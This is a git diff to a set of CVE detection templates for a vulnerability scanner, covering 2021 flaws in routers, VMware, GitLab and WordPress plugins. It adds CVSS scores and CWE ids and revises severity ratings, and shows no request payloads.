b/cves/2021/CVE-2021-20090.yaml index 9c9c57c372..f0e0214349 100644 --- a/cves/2021/CVE-2021-20090.yaml +++ b/cves/2021/CVE-2021-20090.yaml @@ -11,6 +11,11 @@ info: - https://www.tenable.com/security/research/tra-2021-13 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 tags: cve,cve2021,lfi,buffalo,firmware,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-20090 + cwe-id: CWE-22 requests: - raw: diff --git a/cves/2021/CVE-2021-20091.yaml b/cves/2021/CVE-2021-20091.yaml index 6ac0d4f526..650be7cd88 100644 --- a/cves/2021/CVE-2021-20091.yaml +++ b/cves/2021/CVE-2021-20091.yaml @@ -3,7 +3,7 @@ id: CVE-2021-20091 info: name: Buffalo WSR-2533DHPL2 - Configuration File Injection author: gy741,pdteam,parth - severity: critical + severity: high description: | The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. reference: @@ -11,6 +11,10 @@ info: - https://www.tenable.com/security/research/tra-2021-13 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 tags: cve,cve2021,buffalo,firmware,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2021-20091 requests: - raw: diff --git a/cves/2021/CVE-2021-20092.yaml b/cves/2021/CVE-2021-20092.yaml index a419448255..72246e7705 100644 --- a/cves/2021/CVE-2021-20092.yaml +++ b/cves/2021/CVE-2021-20092.yaml @@ -3,7 +3,7 @@ id: CVE-2021-20092 info: name: Buffalo WSR-2533DHPL2 - Improper Access Control author: gy741,pdteam,parth - severity: critical + severity: high description: | The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor. reference: @@ -11,6 +11,11 @@ info: - https://www.tenable.com/security/research/tra-2021-13 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 tags: cve,cve2021,buffalo,firmware,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-20092 + cwe-id: CWE-200 requests: - raw: diff --git a/cves/2021/CVE-2021-20114.yaml b/cves/2021/CVE-2021-20114.yaml index 981a841397..1d17cd2a0e 100644 --- a/cves/2021/CVE-2021-20114.yaml +++ b/cves/2021/CVE-2021-20114.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-20114 tags: cve,cve2021,tcexam,disclosure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-20114 + cwe-id: CWE-200 requests: - method: GET path: diff --git a/cves/2021/CVE-2021-21234.yaml b/cves/2021/CVE-2021-21234.yaml index cbfbd7cb86..182a3934d7 100644 --- a/cves/2021/CVE-2021-21234.yaml +++ b/cves/2021/CVE-2021-21234.yaml @@ -10,6 +10,11 @@ info: - https://github.com/cristianeph/vulnerability-actuator-log-viewer - https://nvd.nist.gov/vuln/detail/CVE-2021-21234 tags: cve,cve2021,springboot,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N + cvss-score: 7.70 + cve-id: CVE-2021-21234 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-21307.yaml b/cves/2021/CVE-2021-21307.yaml index 83f46804d2..53b683b142 100644 --- a/cves/2021/CVE-2021-21307.yaml +++ b/cves/2021/CVE-2021-21307.yaml @@ -10,6 +10,11 @@ info: - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md - https://nvd.nist.gov/vuln/detail/CVE-2021-21307 tags: cve,cve2021,rce,lucee,adobe + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-21307 + cwe-id: CWE-862 requests: - raw: diff --git a/cves/2021/CVE-2021-21315.yaml b/cves/2021/CVE-2021-21315.yaml index 13d9c5e2c7..a2289106db 100644 --- a/cves/2021/CVE-2021-21315.yaml +++ b/cves/2021/CVE-2021-21315.yaml @@ -9,6 +9,11 @@ info: - https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC - https://security.netapp.com/advisory/ntap-20210312-0007/ tags: nodejs,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.80 + cve-id: CVE-2021-21315 + cwe-id: CWE-78 requests: - method: GET diff --git a/cves/2021/CVE-2021-21389.yaml b/cves/2021/CVE-2021-21389.yaml index adec07c32f..5d83282a56 100644 --- a/cves/2021/CVE-2021-21389.yaml +++ b/cves/2021/CVE-2021-21389.yaml @@ -3,7 +3,7 @@ id: CVE-2021-21389 info: name: BuddyPress REST API Privilege Escalation to RCE author: lotusdll - severity: critical + severity: high description: The BuddyPress WordPress plugin was affected by an REST API Privilege Escalation to RCE reference: - https://github.com/HoangKien1020/CVE-2021-21389 @@ -11,6 +11,11 @@ info: - https://codex.buddypress.org/releases/version-7-2-1/ - https://github.com/buddypress/BuddyPress/security/advisories/GHSA-m6j4-8r7p-wpp3 tags: cve,cve2021,wordpress,wp-plugin,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2021-21389 + cwe-id: CWE-863 requests: diff --git a/cves/2021/CVE-2021-21402.yaml b/cves/2021/CVE-2021-21402.yaml index 816303d5e5..c3c29e4665 100644 --- a/cves/2021/CVE-2021-21402.yaml +++ b/cves/2021/CVE-2021-21402.yaml @@ -3,13 +3,18 @@ id: CVE-2021-21402 info: name: Jellyfin prior to 10.7.0 Unauthenticated Arbitrary File Read author: dwisiswant0 - severity: high + severity: medium description: | Jellyfin allows unauthenticated arbitrary file read. This issue is more prevalent when Windows is used as the host OS. Servers that are exposed to the public Internet are potentially at risk. This is fixed in version 10.7.1. reference: https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/ tags: cve,cve2021,jellyfin,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2021-21402 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-21479.yaml b/cves/2021/CVE-2021-21479.yaml index 5d60f46f48..befe4c3526 100644 --- a/cves/2021/CVE-2021-21479.yaml +++ b/cves/2021/CVE-2021-21479.yaml @@ -9,6 +9,11 @@ info: In SCIMono before 0.0.19, it is possible for an attacker to inject and execute java expression compromising the availability and integrity of the system. tags: cve,cve2021,scimono,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H + cvss-score: 9.10 + cve-id: CVE-2021-21479 + cwe-id: CWE-74 requests: - method: GET diff --git a/cves/2021/CVE-2021-21801.yaml b/cves/2021/CVE-2021-21801.yaml index 338eccbd88..7168dc705a 100644 --- a/cves/2021/CVE-2021-21801.yaml +++ b/cves/2021/CVE-2021-21801.yaml @@ -7,6 +7,11 @@ info: description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 tags: cve,cve2021,r-seenet,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-21801 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-21802.yaml b/cves/2021/CVE-2021-21802.yaml index a3eeb5f61e..a17edd857e 100644 --- a/cves/2021/CVE-2021-21802.yaml +++ b/cves/2021/CVE-2021-21802.yaml @@ -7,6 +7,11 @@ info: description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 tags: cve,cve2021,r-seenet,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-21802 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-21803.yaml b/cves/2021/CVE-2021-21803.yaml index 93a8fcf35e..1068d20cde 100644 --- a/cves/2021/CVE-2021-21803.yaml +++ b/cves/2021/CVE-2021-21803.yaml @@ -7,6 +7,11 @@ info: description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 tags: cve,cve2021,r-seenet,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-21803 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-21816.yaml b/cves/2021/CVE-2021-21816.yaml index e8df776430..de4ad69f3f 100644 --- a/cves/2021/CVE-2021-21816.yaml +++ b/cves/2021/CVE-2021-21816.yaml @@ -7,6 +7,11 @@ info: severity: medium reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281 tags: cve,cve2021,dlink,exposure,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N + cvss-score: 4.30 + cve-id: CVE-2021-21816 + cwe-id: CWE-922 requests: - method: GET diff --git a/cves/2021/CVE-2021-21972.yaml b/cves/2021/CVE-2021-21972.yaml index 4e9eb24eec..d69c8904d3 100644 --- a/cves/2021/CVE-2021-21972.yaml +++ b/cves/2021/CVE-2021-21972.yaml @@ -7,6 +7,11 @@ info: reference: https://swarm.ptsecurity.com/unauth-rce-vmware/ description: The vulnerability allows unauthenticated remote attackers to upload files leading to remote code execution (RCE). This templates only detects the plugin. tags: cve,cve2021,vmware,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-21972 + cwe-id: CWE-269 requests: - method: GET diff --git a/cves/2021/CVE-2021-21975.yaml b/cves/2021/CVE-2021-21975.yaml index e7337d9775..043597989c 100644 --- a/cves/2021/CVE-2021-21975.yaml +++ b/cves/2021/CVE-2021-21975.yaml @@ -3,10 +3,15 @@ id: CVE-2021-21975 info: name: vRealize Operations Manager API SSRF (VMWare Operations) author: luci - severity: critical + severity: high description: A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials or trigger Remote Code Execution using CVE-2021-21983. tags: cve,cve2021,ssrf,vmware,vrealize reference: https://www.vmware.com/security/advisories/VMSA-2021-0004.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-21975 + cwe-id: CWE-918 requests: - raw: diff --git a/cves/2021/CVE-2021-21978.yaml b/cves/2021/CVE-2021-21978.yaml index 396c5b2fbc..5dc7d8641b 100644 --- a/cves/2021/CVE-2021-21978.yaml +++ b/cves/2021/CVE-2021-21978.yaml @@ -11,6 +11,11 @@ info: An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted file leading to remote code execution within the logupload container. tags: cve,cve2021,vmware,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-21978 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2021/CVE-2021-21985.yaml b/cves/2021/CVE-2021-21985.yaml index ad807159dc..3c61e44f64 100644 --- a/cves/2021/CVE-2021-21985.yaml +++ b/cves/2021/CVE-2021-21985.yaml @@ -11,6 +11,11 @@ info: - https://www.vmware.com/security/advisories/VMSA-2021-0010.html - https://github.com/alt3kx/CVE-2021-21985_PoC tags: cve,cve2021,rce,vsphere + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-21985 + cwe-id: CWE-20 requests: - raw: diff --git a/cves/2021/CVE-2021-22122.yaml b/cves/2021/CVE-2021-22122.yaml index 53c6058203..83ca4f6d61 100644 --- a/cves/2021/CVE-2021-22122.yaml +++ b/cves/2021/CVE-2021-22122.yaml @@ -11,6 +11,11 @@ info: - https://www.fortiguard.com/psirt/FG-IR-20-122 - https://twitter.com/ptswarm/status/1357316793753362433 tags: cve,cve2021,fortiweb,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-22122 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-22145.yaml b/cves/2021/CVE-2021-22145.yaml index e018f535d1..3a38bddc00 100644 --- a/cves/2021/CVE-2021-22145.yaml +++ b/cves/2021/CVE-2021-22145.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-22145 - https://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.html tags: cve,cve2021,elascticsearch + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2021-22145 + cwe-id: CWE-209 requests: - method: POST diff --git a/cves/2021/CVE-2021-22214.yaml b/cves/2021/CVE-2021-22214.yaml index b4e407b056..f1fcc89ba3 100644 --- a/cves/2021/CVE-2021-22214.yaml +++ b/cves/2021/CVE-2021-22214.yaml @@ -3,13 +3,18 @@ id: CVE-2021-22214 info: author: Suman_Kar name: Unauthenticated Gitlab SSRF - CI Lint API - severity: medium + severity: high description: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-22214 - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html - https://docs.gitlab.com/ee/api/lint.html tags: cve,cve2021,gitlab,ssrf,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.60 + cve-id: CVE-2021-22214 + cwe-id: CWE-918 requests: - raw: diff --git a/cves/2021/CVE-2021-22873.yaml b/cves/2021/CVE-2021-22873.yaml index ba23365c25..f0ccf1f6b7 100644 --- a/cves/2021/CVE-2021-22873.yaml +++ b/cves/2021/CVE-2021-22873.yaml @@ -3,10 +3,15 @@ id: CVE-2021-22873 info: name: Revive Adserver < 5.1.0 Open Redirect author: pudsec - severity: low + severity: medium description: Revive Adserver before 5.1.0 is vulnerable to open redirects via the dest, oadest, and ct0 parameters of the lg.php and ck.php delivery scripts. reference: https://nvd.nist.gov/vuln/detail/CVE-2021-22873 tags: cve,cve2021,redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-22873 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2021/CVE-2021-22986.yaml b/cves/2021/CVE-2021-22986.yaml index 508e2fda49..230b015a29 100644 --- a/cves/2021/CVE-2021-22986.yaml +++ b/cves/2021/CVE-2021-22986.yaml @@ -8,6 +8,10 @@ info: reference: - https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986 - https://support.f5.com/csp/article/K03009991 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-22986 requests: - raw: diff --git a/cves/2021/CVE-2021-23241.yaml b/cves/2021/CVE-2021-23241.yaml index 67b62f066e..da0426c806 100644 --- a/cves/2021/CVE-2021-23241.yaml +++ b/cves/2021/CVE-2021-23241.yaml @@ -9,6 +9,11 @@ info: - https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md - https://nvd.nist.gov/vuln/detail/CVE-2021-23241 tags: cve,cve2021,iot,lfi,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-23241 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-24146.yaml b/cves/2021/CVE-2021-24146.yaml index c950e67161..61d3d453df 100644 --- a/cves/2021/CVE-2021-24146.yaml +++ b/cves/2021/CVE-2021-24146.yaml @@ -7,6 +7,11 @@ info: severity: high reference: https://wpscan.com/vulnerability/c7b1ebd6-3050-4725-9c87-0ea525f8fecc tags: wordpress,wp-plugin,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.50 + cve-id: CVE-2021-24146 + cwe-id: CWE-284 requests: - method: GET diff --git a/cves/2021/CVE-2021-24176.yaml b/cves/2021/CVE-2021-24176.yaml index 54bede3572..1d03f5739e 100644 --- a/cves/2021/CVE-2021-24176.yaml +++ b/cves/2021/CVE-2021-24176.yaml @@ -9,6 +9,11 @@ info: - https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585 - https://wordpress.org/plugins/jh-404-logger/ tags: cve,cve2021,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.40 + cve-id: CVE-2021-24176 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24210.yaml b/cves/2021/CVE-2021-24210.yaml index faca3d5383..50b0897459 100644 --- a/cves/2021/CVE-2021-24210.yaml +++ b/cves/2021/CVE-2021-24210.yaml @@ -9,8 +9,13 @@ info: ago (https://wordpress.org/support/topic/phast-php-used-for-remote-fetch/) that says that the php involved in the request only go to whitelisted pages but it's possible to redirect the victim to any domain. reference: https://wpscan.com/vulnerability/9b3c5412-8699-49e8-b60c-20d2085857fb - severity: low + severity: medium tags: wordpress,cve,cve2021,redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24210 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2021/CVE-2021-24235.yaml b/cves/2021/CVE-2021-24235.yaml index 6da6293c88..1178e0035a 100644 --- a/cves/2021/CVE-2021-24235.yaml +++ b/cves/2021/CVE-2021-24235.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24235 tags: cve,cve2021,wordpress,xss,wp-theme + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24235 + cwe-id: CWE-79 + description: "The Goto WordPress theme before 2.0 does not sanitise the keywords and start_date GET parameter on its Tour List page, leading to an unauthenticated reflected Cross-Site Scripting issue." requests: - method: GET diff --git a/cves/2021/CVE-2021-24237.yaml b/cves/2021/CVE-2021-24237.yaml index 365eb7c2d9..c9842dc7c4 100644 --- a/cves/2021/CVE-2021-24237.yaml +++ b/cves/2021/CVE-2021-24237.yaml @@ -9,6 +9,11 @@ info: reference: - https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24237 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24285.yaml b/cves/2021/CVE-2021-24285.yaml index 7fb471bc6f..d620d2d396 100644 --- a/cves/2021/CVE-2021-24285.yaml +++ b/cves/2021/CVE-2021-24285.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-24285 - https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/ - https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-24285 + cwe-id: CWE-89 requests: - raw: diff --git a/cves/2021/CVE-2021-24288.yaml b/cves/2021/CVE-2021-24288.yaml index d5b21f2ecd..5b0b13cded 100644 --- a/cves/2021/CVE-2021-24288.yaml +++ b/cves/2021/CVE-2021-24288.yaml @@ -7,6 +7,11 @@ info: description: When using acymailing to subscribe to a newsletter, you make a POST request with various parameters. Turning that to a GET request and adding the parameters as GET parameters, you can successfully go through with the subscription. reference: https://wpscan.com/vulnerability/56628862-1687-4862-9ed4-145d8dfbca97 tags: wordpress,cve,cve2021,redirect,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24288 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2021/CVE-2021-24291.yaml b/cves/2021/CVE-2021-24291.yaml index 3d7e73cfbc..736f309f8a 100644 --- a/cves/2021/CVE-2021-24291.yaml +++ b/cves/2021/CVE-2021-24291.yaml @@ -7,6 +7,11 @@ info: reference: https://wpscan.com/vulnerability/cfb982b2-8b6d-4345-b3ab-3d2b130b873a severity: medium tags: cve,cve2021,xss,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24291 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24298.yaml b/cves/2021/CVE-2021-24298.yaml index 40b4fa673f..21462431a1 100644 --- a/cves/2021/CVE-2021-24298.yaml +++ b/cves/2021/CVE-2021-24298.yaml @@ -7,6 +7,11 @@ info: description: The method and share GET parameters of the Giveaway pages were not sanitised, validated or escaped before being output back in the pages, thus leading to reflected XSS reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24298 tags: cve,cve2021,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24298 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24316.yaml b/cves/2021/CVE-2021-24316.yaml index f4b9b78af4..9d76374f71 100644 --- a/cves/2021/CVE-2021-24316.yaml +++ b/cves/2021/CVE-2021-24316.yaml @@ -9,6 +9,11 @@ info: reference: - https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e - https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24316 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24320.yaml b/cves/2021/CVE-2021-24320.yaml index 408f23de62..458e6b28e6 100644 --- a/cves/2021/CVE-2021-24320.yaml +++ b/cves/2021/CVE-2021-24320.yaml @@ -9,6 +9,11 @@ info: - https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt - https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb tags: cve,cve2021,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24320 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24335.yaml b/cves/2021/CVE-2021-24335.yaml index 960dfbe32b..89d2be4bec 100644 --- a/cves/2021/CVE-2021-24335.yaml +++ b/cves/2021/CVE-2021-24335.yaml @@ -7,6 +7,11 @@ info: description: The Car Repair Services & Auto Mechanic WordPress theme before 4.0 did not properly sanitise its serviceestimatekey search parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting issue reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24335 tags: cve,cve2021,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24335 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24340.yaml b/cves/2021/CVE-2021-24340.yaml index a20c217e53..498fb61986 100644 --- a/cves/2021/CVE-2021-24340.yaml +++ b/cves/2021/CVE-2021-24340.yaml @@ -3,13 +3,18 @@ id: CVE-2021-24340 info: name: WordPress Plugin WP Statistics 13.0-.7 - Unauthenticated Time-Based Blind SQL Injection author: lotusdll - severity: critical + severity: high description: The WP Statistic WordPress plugin was affected by an Unauthenticated Time-Based Blind SQL Injection security vulnerability. reference: - https://www.exploit-db.com/exploits/49894 - https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/ - https://github.com/Udyz/WP-Statistics-BlindSQL tags: cve,cve2021,wordpress,wp-plugin,unauth,sqli,blind + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-24340 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2021/CVE-2021-24387.yaml b/cves/2021/CVE-2021-24387.yaml index fa60b34342..8d0e643b50 100644 --- a/cves/2021/CVE-2021-24387.yaml +++ b/cves/2021/CVE-2021-24387.yaml @@ -10,6 +10,11 @@ info: severity: medium tags: cve,cve2021,xss,wordpress reference: https://cxsecurity.com/issue/WLB-2021070041 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24387 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2021/CVE-2021-24389.yaml b/cves/2021/CVE-2021-24389.yaml index 3b6b1bb833..024f7e7b87 100644 --- a/cves/2021/CVE-2021-24389.yaml +++ b/cves/2021/CVE-2021-24389.yaml @@ -7,6 +7,11 @@ info: description: The WP Foodbakery WordPress plugin before 2.2, used in the FoodBakery WordPress theme before 2.2 did not properly sanitize the foodbakery_radius parameter before outputting it back in the response, leading to an unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability. reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24389 tags: cve,cve2021,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24389 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24406.yaml b/cves/2021/CVE-2021-24406.yaml index 5ef2b21f2c..5663561a64 100644 --- a/cves/2021/CVE-2021-24406.yaml +++ b/cves/2021/CVE-2021-24406.yaml @@ -5,8 +5,13 @@ info: author: 0x_Akoko description: The plugin did not validate the redirect_to parameter in the login form of the forum, leading to an open redirect issue after a successful login. reference: https://wpscan.com/vulnerability/a9284931-555b-4c96-86a3-09e1040b0388 - severity: low + severity: medium tags: wordpress,redirect,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24406 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2021/CVE-2021-24472.yaml b/cves/2021/CVE-2021-24472.yaml index b45ea11b81..634ca3ad27 100644 --- a/cves/2021/CVE-2021-24472.yaml +++ b/cves/2021/CVE-2021-24472.yaml @@ -4,9 +4,14 @@ info: author: Suman_Kar name: Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Unauthenticated RFI and SSRF description: The theme and plugin have exposed proxy functionality to unauthenticated users, sending requests to this proxy functionality will have the web server fetch and display the content from any URI, this would allow for SSRF (Server Side Request Forgery) and RFI (Remote File Inclusion) vulnerabilities on the website. - severity: high + severity: critical reference: https://wpscan.com/vulnerability/17591ac5-88fa-4cae-a61a-4dcf5dc0b72a tags: cve,cve2021,wordpress,lfi,ssrf,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: 